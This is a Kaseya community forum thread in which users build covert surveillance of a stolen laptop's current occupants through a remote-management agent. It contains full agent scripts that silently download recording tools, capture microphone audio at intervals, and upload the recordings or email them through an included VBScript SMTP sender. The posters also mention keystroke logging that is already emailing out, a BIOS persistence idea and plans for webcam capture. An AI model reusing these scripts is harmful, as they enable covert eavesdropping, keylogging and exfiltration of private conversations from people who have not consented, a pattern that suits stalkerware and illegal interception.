Kaseya Community

Stolen Laptop

  • I think the Police are finally ready to do something, I spoke with the detective on the case a couple hours ago and they're persuing a warrant in the next 24 hours. He said the amount of information I collected should speed it along and after the warrant things will happen quickly.

    However I'm sort of bored now, we know everything about the people that now have the laptop, the challenge is now gone yet we still dont have it. So now i'm interested in someone's previous post about audio capture, that would also be handy!

    Anyone know of any stealth/spy command line audio capture apps?

    I like the idea of contacting the local news, mainly because it's such an interesting story!

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    I think the Police are finally ready to do something, I spoke with the detective on the case a couple hours ago and they're persuing a warrant in the next 24 hours. He said the amount of information I collected should speed it along and after the warrant things will happen quickly.

    However I'm sort of bored now, we know everything about the people that now have the laptop, the challenge is now gone yet we still dont have it. So now i'm interested in someone's previous post about audio capture, that would also be handy!

    Anyone know of any stealth/spy command line audio capture apps?

    I like the idea of contacting the local news, mainly because it's such an interesting story!


    I put this together over the past few hours (the trick was finding the right combination of tools...)

    I think this is only half of the job. The really difficult part will be trying to set the built-in Microphone as the default recording device via command line. If it is not set, this script may not be of any help.

    This script will attempt to capture audio at 30 second intervals then uploads the audio to the Kaseya server in MP3 format. I'd recommend scheduling the script for every 0.5 minutes.

    Script Name: Record Audio - Windows
    Script Description: This script will deploy the tools necessary to silently record audio from a Windows-based PC and then attempt to record audio in 60 second increments and save them to the Kaseya server, linked in the 'Documents' tab for the agent.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF Test File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\linco.exe
    Absent :
    THEN
    Get URL
    Parameter 1 : http://downloads.sourceforge.net/project/liveincode/lineincode/2.10/linco-2.10.zip
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\linco-2.10.zip
    Parameter 3 : 3
    OS Type : 13
    Get URL
    Parameter 1 : http://www.freecodecs.net/fc/lame3.98.2.zip
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\lame3.98.2.zip
    Parameter 3 : 3
    OS Type : 13
    Write File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\unzip.exe
    Parameter 2 : VSASharedFiles\unzip.exe
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\unzip.exe" -o -q "#vAgentConfiguration.AgentTempDir#\lame3.98.2.zip" -d "#vAgentConfiguration.AgentTempDir#"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\unzip.exe" -o -q "#vAgentConfiguration.AgentTempDir#\linco-2.10.zip" -d "#vAgentConfiguration.AgentTempDir#"
    Parameter 2 : 1
    OS Type : 13
    Schedule Script
    Parameter 1 : 35034054
    Parameter 2 :
    Parameter 3 : #vMachine.Machine_GroupID#
    OS Type : 13
    ELSE
    Close Application
    Parameter 1 : linco.exe
    OS Type : 13
    Close Application
    Parameter 1 : lame.exe
    OS Type : 13
    Execute Shell Command
    Parameter 1 : echo %random%>> "#vAgentConfiguration.AgentTempDir#\rand"
    Parameter 2 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\rand
    Parameter 3 : rand
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\linco.exe" -B 16 -C 2 -R 44100 -D 0:0:30 | "#vAgentConfiguration.AgentTempDir#\lame.exe" -V 8 -B 128 -r - "#vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3
    Parameter 2 : ..\Docs\recording-#rand#.mp3
    Parameter 3 : 1
    OS Type : 13
    Delete File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3
    OS Type : 13



    After searching around a while, this is the closest I have got to figuring out how to set the Microphone as the default recording device:

    http://www.autohotkey.com/docs/commands/SoundSet.htm

    Considering multiple sound devices might exist on a machine it may be difficult to figure out the right one to use. I'll try to look into this further later today...

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • Wow excellent work. I also found something that worked easily on my laptop, a command line file called cmd2wav.exe

    I ran it and it worked great as wav, haven't tried to get it to compress to mp3 before sending back to the server yet, was getting late. I'll be working on some of this today, thanks for the effort Benjamin!

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    Wow excellent work. I also found something that worked easily on my laptop, a command line file called cmd2wav.exe

    I ran it and it worked great as wav, haven't tried to get it to compress to mp3 before sending back to the server yet, was getting late. I'll be working on some of this today, thanks for the effort Benjamin!


    If you use the audio recording scripts and they aren't actually recording anything you'll need to change the default recording input.

    What OS is this system? XP or Vista ?

    Vista handles it's mixer devices a little different than XP -- so far I've just used the scripts below on XP.

    One script is for collecting the mixer devices, the second will making the necessary changes to the recording and playback settings (you want to be sure to have the Mic muted if you start recording from it, so as to not play it back and get a nasty echo effect...)

    Test these out before running them on the stolen laptop to be sure you know how they work:

    Script Name: Get Sound Devices - Step 1
    Script Description: This script deploys a tool to detect the mixer devices on a Windows machine.

    Analyze the output via the script log or raw file collected on the agent Documents tab and determine what device to use for recording then modify Step 2 accordingly.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF True
    THEN
    Get URL
    Parameter 1 : http://files.kaseya.com/sftp/volumeline.exe
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumeline.exe
    Parameter 3 : 3
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" GET:ALL >> "#vAgentConfiguration.AgentTempDir#\volumelineresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\volumelineresults.txt
    Parameter 2 : ..\Docs\volumelineresults.txt
    Parameter 3 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumelineresults.txt
    Parameter 3 : volumelineresults
    OS Type : 13
    Write Script Log Entry
    Parameter 1 : Volume Results: #volumelineresults#
    OS Type : 13
    ELSE



    Script Name: Set Recording Mixer Device & Mute Mic - Step 2
    Script Description: This script sets the volume to 100% and selects a particular device for recording based on the output gathered by the first script.
    Be sure to set the variables below accordingly.
    Identify the Mic playback device and make sure to mute that to be sure you are not playing back the microphone input.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF True
    THEN
    Get URL
    Parameter 1 : http://files.kaseya.com/sftp/volumeline.exe
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumeline.exe
    Parameter 3 : 3
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 1
    Parameter 3 : recordmixerdeviceid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : recordmixergroupid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 2
    Parameter 3 : recordmixercontrolid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : playmixerdeviceid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : playmixergroupid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 3
    Parameter 3 : playmixercontrolid
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#recordmixerdeviceid#:#recordmixergroupid#:#recordmixercontrolid# SELECT >> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#recordmixerdeviceid#:#recordmixergroupid#:#recordmixercontrolid# VOLUME:100 >>>> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#playmixerdeviceid#:#playmixergroupid#:#playmixercontrolid# MUTE:ON >>>> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt
    Parameter 2 : ..\Docs\volumelinesetresults.txt
    Parameter 3 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt
    Parameter 3 : volumelinesetresults
    OS Type : 13
    Write Script Log Entry
    Parameter 1 : Volume Set Results: #volumelinesetresults#
    OS Type : 13
    ELSE



    Now the trick is specifying the default recording device via another utility or script if it isn't set to the right device.

    It looks like that will best be done in the registry and it is done on a per-user basis. I'll be working on that later if it looks like you may need it, just be sure to post the updates to the forum and let us know how things are progressing Smile

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • I have had luck with my script so far on a couple laptops I've tested, without having to do anything with confirming audio sources like you were mentioning. Maybe I've just gotten lucky and will realize that I do need to figure that out, but so far this one works great.

    I have it capture audio for 10 minutes with cmd2wav.exe, convert to MP3 with lame.exe then email using a VBS script using CDO (I dont know what that means but it's what it was called). I then have it run a copy of this script and then another copy 6 times. I schedule the initial script once an hour and now I have a way to hear everything they say continuously (except for the few seconds it takes to compress and email). I then open the wav file using Audacity and visibly look for peaks in the wave and only listen to those.

    Links:

    cmd2wav.exe
    lame.exe

    Script Name: Audio
    Script Description:

    IF Test File
    Parameter 1 : c:\kaseya\cmd2wav.exe
    Exists :
    THEN
    Execute Shell Command
    Parameter 1 : c:\kaseya\cmd2wav c:\kaseya\audio.wav 600 8 1 8000
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\lame.exe -b 16 c:\kaseya\audio.wav c:\kaseya\audio.mp3
    Parameter 2 : 0
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : 0
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.mp3
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.wav
    OS Type : 0
    Execute Script
    Parameter 1 : Audio 2 (NOTE: Script reference is NOT imported. Correct manually in script editor.
    Parameter 2 :
    Parameter 3 : 0
    OS Type : 0
    ELSE
    Write File
    Parameter 1 : c:\kaseya\cmd2wav.exe
    Parameter 2 : VSASharedFiles\cmd2wav.exe
    OS Type : 0
    Write File
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : VSASharedFiles\audio.vbs
    OS Type : 0
    Write File
    Parameter 1 : c:\kaseya\lame.exe
    Parameter 2 : VSASharedFiles\lame.exe
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\cmd2wav c:\kaseya\audio.wav 600 8 1 8000
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\lame.exe -b 16 c:\kaseya\audio.wav c:\kaseya\audio.mp3
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : 0
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.mp3
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.wav
    OS Type : 0


    audio.vbs:

    Const cdoSendUsingPickup = 1 'Send message using the local SMTP service pickup directory. 
    Const cdoSendUsingPort = 2 'Send the message using the network (SMTP over the network).

    Const cdoAnonymous = 0 'Do not authenticate
    Const cdoBasic = 1 'basic (clear-text) authentication
    Const cdoNTLM = 2 'NTLM

    Set objMessage = CreateObject("CDO.Message")
    objMessage.Subject = "Audio Capture"
    objMessage.From = "(from email)"
    objMessage.To = "(to email)"
    objMessage.TextBody = "Attachment."
    objMessage.AddAttachment "c:\kaseya\audio.mp3"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "(smtp server)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = cdoBasic
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendusername") = "(smtp user name)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "(smtp password)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
    objMessage.Configuration.Fields.Update
    objMessage.Send


    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • Benjamin.Lavalley@kaseya.com

    What OS is this system? XP or Vista ?


    The script I made works on both

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • Glad to hear you didn't run into any issues with the recording devices -- at least the scripts are here if you need them.

    I've done a good bit with CDO in the past dealing with Exchange. Is email the best mechanism to go with for transferring the files back and forth though? Some ISPs block outbound port 25 and running a VBscript might trigger security software to block the file.

    It sounds like they must be really leaving this machine on for a long time if you'll be able to get an hours worth of audio. I leaned more towards capturing any bits of audio I could even if a machine was only online briefly. It does makes dealing with the audio on the back-end a little more difficult when you have to recombine all the audio files sorting by the timestamp on the file.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • It's already emailing keystrokes through the same SMTP server so in this case I know it works, but in other cases i could just use a Get file.

    It emails the audio every 10 minutes, but since Kaseys scripts only allow you to schedule at a minimum of once an hour I repeated the script 6 times. They have it on about 6 hours a day, so even as long as 10 minute clips that's a lot of mp3's to parse through. I dont have the file timestamped, which would be easy to do, but it's time stamped in my Outlook in this case it's easy enough to figure out. But a more robust and consistent script would probably be better doing the things you mentioned.

    I'll keep working on this and see where it gets me. They haven't been online since I created it so haven't actually captured their audio yet, just mine in tests

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    It's already emailing keystrokes through the same SMTP server so in this case I know it works, but in other cases i could just use a Get file.

    It emails the audio every 10 minutes, but since Kaseys scripts only allow you to schedule at a minimum of once an hour I repeated the script 6 times. They have it on about 6 hours a day, so even as long as 10 minute clips that's a lot of mp3's to parse through. I dont have the file timestamped, which would be easy to do, but it's time stamped in my Outlook in this case it's easy enough to figure out. But a more robust and consistent script would probably be better doing the things you mentioned.

    I'll keep working on this and see where it gets me. They haven't been online since I created it so haven't actually captured their audio yet, just mine in tests


    You can put in decimal values for how often you run a script, just do some basic division and you can run the scripts ever 0.008 hours or 30 seconds. If the machine is on for 6 hours a day it isn't necessary in this case but at least you know you can get things to run at very short intervals in the future. The files themselves have their 'date modified' timestamp which should be good enough to sort them out once they're received.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • Excellent, didn't know that! Thanks for all your help, hopefully will have an update soon on how all this works. Of course now that I want the laptop online it isn't...

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • All we need now is a way for the Kaseya agent to survive a HD format or replacement. I see that it is now possible to embed code in the BIOS, perhaps this might work. A small BIOS code snippet that instructs the OS to re-download the kaseya agent would be all that is needed...

    http://cyberinsecure.com/new-bios-attack-might-allow-malware-survive-hard-disk-format-and-bios-reflashing/

    Mike.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: lansoft
  • Many laptops now have a built in webcam.

    Anyone got a good way to grab screen shots - or even better, stream directly from it?

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: jasonjordan
  • The laptop came online last night right before I went to bed. I ran the script but the audio came back completely blank. I was tired so just gave up for the night. But she left it on all night so I got up early and remoted on using Terminal Server since no one was using it, and no one would see me clicking around. The recording dropdown driver has nothing to choose from, so not sure what's going on with that. It could be disabled or just not working. Drivers seemed ok.

    I did confirm that the wireless networks are still the same as my iPhone scanned when I was at the location, so I know it's still in the same spot, so hopefully the warrant comes through real quick.

    There's no webcam on this laptop, but there's one on mine so can do some tests with webcam scripts on it..

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG, I LOVE your investigation work. I have been laughing at all of the amazing things you and Ben have put together. Please keep us up to date on the happenings.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: chad.gniffke
  • jasonjordan
    Many laptops now have a built in webcam.

    Anyone got a good way to grab screen shots - or even better, stream directly from it?


    I have them for both Windows & Mac -- capturing pictures and video.

    Will post them up later.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com